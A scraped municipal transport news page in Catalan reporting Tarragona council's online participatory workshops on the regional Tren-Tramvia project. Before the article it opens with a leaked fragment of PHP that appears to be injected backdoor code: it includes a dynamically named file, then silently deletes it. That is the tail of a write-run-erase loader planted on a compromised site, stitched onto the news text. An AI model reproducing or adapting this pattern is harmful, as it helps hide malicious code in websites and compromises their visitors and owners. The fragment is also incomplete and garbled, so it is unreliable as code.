");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Tarragona convoca tallers participatius amb entitats per debatre del nou Tran-Camp
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'Ajuntament de Tarragona convoca tallers participatius amb entitats per debatre del nou Tran-Camp (01/03/2021)

L’Ajuntament de Tarragona vol generar un espai per a la participació i debat entorn del projecte del Tren-Tramvia, un projecte que el Departament de Territori i Sostenibilitat de la Generalitat de Catalunya ha sotmès a informació pública. En concret, ajuntaments, entitats, associacions, empreses i ciutadania disposen de 30 dies per analitzar i formular aŀlegacions a l’estudi informatiu i l’estudi d’impacte ambiental del nou Tren-Tramvia del Camp de Tarragona.

Per aquest motiu, el consistori ha convocat tallers participatius i trobades amb entitats socials i empresarials representatives per donar resposta i posicionament de ciutat al model de mobilitat que es deriva del nou model de Tren Tramvia que se’ns planteja des de la Generalitat.

L’objectiu és generar un espai per a la participació i debat entorn a aquest nou projecte. Aquestes trobades es duran a terme de forma telemàtica. Es tracta de tres sessions que permetran conèixer en profunditat què ens proposen amb l’estudi informatiu del Tren-Tram de Tarragona, debatre conjuntament què es pensa d’aquesta proposta i posar en comú i consensuar el contingut final de les aŀlegacions que es presentaran al projecte.

Font: Ajuntament de Tarragona

L'Ajuntament de Tarragona convoca tallers participatius amb entitats per debatre del nou Tran-Camp

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona